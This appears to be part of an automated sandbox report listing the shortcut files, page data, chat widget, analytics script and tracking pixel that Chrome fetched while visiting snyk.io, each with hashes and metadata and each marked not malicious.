                                                                                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                                                                                              No context
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 18:48:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2677
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9788380068713667
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:84dxT55AHhidAKZdA19ehwiZUklqeh9y+3:8+LuWy
                                                                                                                                                                                                                                                                                                              MD5:638B660B9E514DDB51BB13090C926286
                                                                                                                                                                                                                                                                                                              SHA1:FE095211AFC60E55FBF708099FC22D4BA96729B0
                                                                                                                                                                                                                                                                                                              SHA-256:53ACE88789959EE1255E70D8292A3B8EA3F742F6063A226D9C29A21B4D9B6BA6
                                                                                                                                                                                                                                                                                                              SHA-512:594070C293B34F246031BBC03927EF5A027C998012AC02017AD29FAEC868A22EDC525B265D9CB7FC88FA931A92791062C26AD0A69AFA896E0EDFB1E004B7A2E5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,.....V..M&..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IXY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........j..p.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 18:48:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2679
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.995978935266575
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:8XdxT55AHhidAKZdA1weh/iZUkAQkqehGy+2:8TLs9Qzy
                                                                                                                                                                                                                                                                                                              MD5:B6A51940ACFD3763CE2650D0B1B5ACD0
                                                                                                                                                                                                                                                                                                              SHA1:258E2C6D481675CF60B914DC83BDB6F1FA8DBD4E
                                                                                                                                                                                                                                                                                                              SHA-256:05D026E7D028591A71C8430A89022A37E40323D0E5494AB7C2D9FC944E098245
                                                                                                                                                                                                                                                                                                              SHA-512:DC426E2F366CAC2926C510D3C94C28998159CC318B81C3C6AAA852F7A06BA0E30BF0A3331A2E376F3AB8D44CD940B1481B19B506B44B67BB360C31C4D2AAF47C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,........M&..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IXY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........j..p.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2693
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.007166509238233
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:8xidxT55sHhidAKZdA14tseh7sFiZUkmgqeh7sUy+BX:8x4Lgn6y
                                                                                                                                                                                                                                                                                                              MD5:B72567D6C1B6E3F96752B6FB3E82188E
                                                                                                                                                                                                                                                                                                              SHA1:6C4B550A9B77A544B9CFEA632F90D7BC06931E55
                                                                                                                                                                                                                                                                                                              SHA-256:A8F97C263C59450E15884790FAB08D4A50FBF9D85E03F4C24CDA184837183835
                                                                                                                                                                                                                                                                                                              SHA-512:1125EF29076E82D02EF0D0B79309C311B668072C3126A8AB9CFF21576E6F0188A2AA3C816EE0EEE8319B149B9CA16B4BA69995A07B025F330499A08EEBEBB38C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IXY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........j..p.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 18:48:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2681
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9941069112200736
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:8XdxT55AHhidAKZdA1vehDiZUkwqehCy+R:8TLXcy
                                                                                                                                                                                                                                                                                                              MD5:727CC66DD0BB0399C15895086A4395C0
                                                                                                                                                                                                                                                                                                              SHA1:E6777EA4B90F13A9050279F386B0CEE80D20DEA8
                                                                                                                                                                                                                                                                                                              SHA-256:10E0A3454B885356228161220D9EF7B84A6EEFAEE01A2BD54462A58CC2F3C4F3
                                                                                                                                                                                                                                                                                                              SHA-512:97261B4D343FEE55EFFF45037DCFA67E71133DD8BCCCDB9944030592A7316B3479DCF4A169FC9832F910A57740872E6639C1BC58938268696A21B1F174601100
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,.... }..M&..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IXY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........j..p.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 18:48:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2681
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9854990717769363
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:8WWdxT55AHhidAKZdA1hehBiZUk1W1qehIy+C:8fLn9oy
                                                                                                                                                                                                                                                                                                              MD5:887954079D2192F1E77604EEE8689A06
                                                                                                                                                                                                                                                                                                              SHA1:78146F005729FF2E4E6A44A0DA0E19DDA5F9EB75
                                                                                                                                                                                                                                                                                                              SHA-256:B21C12D7710A5BBDBBD43F801D1CDA57F4ACC61EE863ACD5904941844D0B6A4A
                                                                                                                                                                                                                                                                                                              SHA-512:36C2C07CE484A06A66C3855B54226ED30855D59194ABC7AC8749DBBF354875A9EAEFFDF5ABC0683ACE18CBB01A4DE586C884A68B0E556AA46E4542503BE402C5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,.......M&..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IXY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........j..p.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 24 18:48:50 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2683
                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9927710759785215
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:8RdxT55AHhidAKZdA1duT+ehOuTbbiZUk5OjqehOuTb6y+yT+:8VLvT/TbxWOvTb6y7T
                                                                                                                                                                                                                                                                                                              MD5:47C2E0327C4FB9E47F2BE65A2FD51EA2
                                                                                                                                                                                                                                                                                                              SHA1:C577B25853F21ECDAC0A6509868C63FCC28321C0
                                                                                                                                                                                                                                                                                                              SHA-256:5B68DAA718A410EF86DAD633530881887D215FE42E76FB02971B4327ED038D8F
                                                                                                                                                                                                                                                                                                              SHA-512:57555395B89A20A22184A9C7B301E04E4F3AF7FF21CA8FB359AEC57A4AF95C4759EB87FEFAA88A49374E481A00BAADB2E5B8A721B2085A2B53E863A9B501AF9B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:L..................F.@.. ...$+.,......M&..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.IXY......B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.VXY......L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.VXY......M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.VXY............................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VXY.............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........j..p.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65510), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):196588
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.091502967928007
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:4UIXwRvCDvm2RN5tB2A9AZDIWacOH2/4QFnOaowmeRJF7ZNuuy:4UIEvWmwxr9UOW/jST
                                                                                                                                                                                                                                                                                                              MD5:A392F81A5F1CCB656FF0F6ADBFD34C74
                                                                                                                                                                                                                                                                                                              SHA1:A11E0EF072C0F352719D5B376D6434DC990E35A0
                                                                                                                                                                                                                                                                                                              SHA-256:8A4D9210E6B9BA14859C361F9E9F524BBA90EE12B643617D612BCE86FE965EB5
                                                                                                                                                                                                                                                                                                              SHA-512:ECC84E100E53792B1E3E36FB8AD84DD40BEBADBC99CB2C803DB5B250490A6897D4514D27923962B920FC28A2C20FF5E52C212A8B8A4D0DBD142F6ED84F3510E5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/solutions/zero-day-vulnerability-security.json?slug=solutions&slug=zero-day-vulnerability-security
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3BJotqXTilNzoXGPZsO5g0","type":"Entry","createdAt":"2023-10-10T23:22:07.462Z","updatedAt":"2024-07-18T21:34:04.740Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":24,"revision":5,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"\"Zero day vuln\" Solutions page","title":"Find and Fix Zero-Day Vulns Fast with Snyk","slug":"find-and-fix-zero-day-vulns-fast-with-snyk","uri":"solutions/zero-day-vulnerability-security","pageLocalization":["fr","ja","pt-BR","de"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3rndEz4wQEiouChUCrwcNV","type":"Entry","createdAt":"2023-10-10T23:22:07.595Z","updatedAt":"2024-07-18T21:34:04.959Z","enviro
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (1551), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1551
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.163322668831666
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:0E01AZ14iwMsom6Zy0zZv9Qxlz/sJ5u/sRxQ75jmlZ1X5E1d1I:0EG+1py0zZvKxiTvQ7Rmh
                                                                                                                                                                                                                                                                                                              MD5:323CF43FB7DD4D8CE2FBF72604328721
                                                                                                                                                                                                                                                                                                              SHA1:56C258DE4E028E0AEF4692678B0068E09AE8331D
                                                                                                                                                                                                                                                                                                              SHA-256:6AB118C2209E402251F0B889442DC77AEBB5F45444A9343C9025CE7CE1D0CEC1
                                                                                                                                                                                                                                                                                                              SHA-512:708AF711CD696CFF96BD5486A478022737B1E63A6004C104AED8A1D3BAEBCAF4ABD65BC9944B2DD3A6B3D1AC975FC2988309DE51026C5F0BB23E7413B4F2ED85
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.driftt.com/core?d=1&embedId=4479srg8vkz5&eId=4479srg8vkz5&region=US&forceShow=false&skipCampaigns=false&sessionId=33b92b4a-3857-4f99-b6b5-ba8f4819d7b3&sessionStarted=1729799400.741&campaignRefreshToken=6e028e55-17c7-4347-8e64-68f1dad2ce32&hideController=false&pageLoadStartTime=1729799362127&mode=CHAT&driftEnableLog=false&secureIframe=false&u=https%3A%2F%2Fsnyk.io%2Fschedule-a-demo%2F
                                                                                                                                                                                                                                                                                                              Preview:<!doctype html><html lang="en"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no"><meta name="theme-color" content="#000000"><link rel="manifest" href="/core/manifest.json"><link rel="dns-prefetch" href="https://js.driftt.com" crossorigin><link rel="dns-prefetch" href="https://customer.api.drift.com" crossorigin><link rel="dns-prefetch" href="https://conversation.api.drift.com" crossorigin><link rel="dns-prefetch" href="https://targeting.api.drift.com" crossorigin><link rel="dns-prefetch" href="https://metrics.api.drift.com" crossorigin><title>Drift Widget</title><script type="text/javascript">__ENV__="PRODUCTION",__BUILD_ID__="20241011172359-6acc819",__REGION__=window.location.search.match("[\\?&]region=([^&#]*)")?window.location.search.match("[\\?&]region=([^&#]*)")[1]:"US"</script><link rel="preload" href="/core/assets/js/runtime~main.ca4e7fb9.js" as="script" crossorigin="anonymous"><link rel="preload" href="/core/assets/j
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):52916
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.51283890397623
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                                                                                                                              MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                                                                                                                              SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                                                                                                                              SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                                                                                                                              SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                                                                                                                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (59872), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):59882
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.096376433523086
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:3B/x6m8DRZEgZQTZvMAORbNAG+EMVvpxl+fm9re9PE8waMe:xp58RZlZWZvTcbNAGmXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:96D8CE9F8955B15EE1E66AE6A018EB0A
                                                                                                                                                                                                                                                                                                              SHA1:2A67DB4853833E9C5AADB82DFB6C622C74BAB0BD
                                                                                                                                                                                                                                                                                                              SHA-256:E5705AB707C8361811EC467244D36107F3241582B7D04751AFA216BC042B2BF3
                                                                                                                                                                                                                                                                                                              SHA-512:042289480494371D571768686CCE7977D65AB023EF2C4517FF3F346CE47BE9D9D6FBAF3649713273DD3CC4B930A3D2EBFB75B876E71A3D39B3DAEE383B40AE1E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/services.json?slug=services
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3YZHUBWaQe7IIXup715Qtn","type":"Entry","createdAt":"2023-01-17T19:25:50.560Z","updatedAt":"2024-03-12T14:49:26.767Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":40,"revision":9,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Support and Services | Snyk","title":"Support and Services | Snyk","uri":"services","pageLocalization":["fr","ja","pt-BR","de"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"i1zfp4h9xEveHp608m5IX","type":"Entry","createdAt":"2023-01-17T19:25:50.690Z","updatedAt":"2024-03-12T14:49:26.861Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":17,"revision":6,"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, was "tmpCfWGAE", last modified: Fri May 8 09:06:08 2020, max compression, original size modulo 2^32 489
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):522
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.343516125324942
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:XJjUv/7Cu7oXqejoa3pS/3vgOGUBbxMFHCKlHIEg3JzWiFlpij:XthXqe3ZS/3IFSbxMFHnXuzRjij
                                                                                                                                                                                                                                                                                                              MD5:3702ADA73B8951017B8451CBD6A96523
                                                                                                                                                                                                                                                                                                              SHA1:FBA130B6F83751655F96DF7F947B9591DA67C50B
                                                                                                                                                                                                                                                                                                              SHA-256:A714DEF57C786512C5F2BA2CC4DFA9EFE919CD5F2004D05378D5BE2377F627EF
                                                                                                                                                                                                                                                                                                              SHA-512:574EE82DDDD8DBCD580883CC3D5F792A9DDABAB2C9651BF262276A0FB05FDE6F6E6C12EAC71381C2613891758459A5EFA0CFA3679049C5A738F6149074162A28
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://app.usercentrics.eu/session/1px.png?settingsId=Zz23KCbJ4
                                                                                                                                                                                                                                                                                                              Preview:.....!.^..tmpCfWGAE.......PNG........IHDR....................iCCPsRGB IEC61966-2.1..(.u..+DQ..?f..G....IX!F..2...4F...y.fF..{o.d.l.(..k._.VY+E.deaMl......s>.{.9.{...)%mT.C:c.....}....(.....gg..8>..M.]...G}L5.....).n.O.O......J2..>.......u...._6..P.\..../..b%.....t.S9.t..%.jf~Nb.X;.!...2.....`D...........g.J."^#..*..........y....j..}N..?.<Y.[..nA.`Y...U<..#\d.....~..P.:..i....Zt..7..A....-..............9...|....A..oZ....g...`h....pHYs...#...#.x.?v....IDAT..c````........N.....IEND.B`....f....
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (41169)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):41172
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.505998162296305
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:j21xCdwV69Odf9dk1fV8iWUwcb9x8cvgBhpU9yC8IEVDlbth3Ia8DdEN:iP3kr8V8vShi98Iiph3IbC
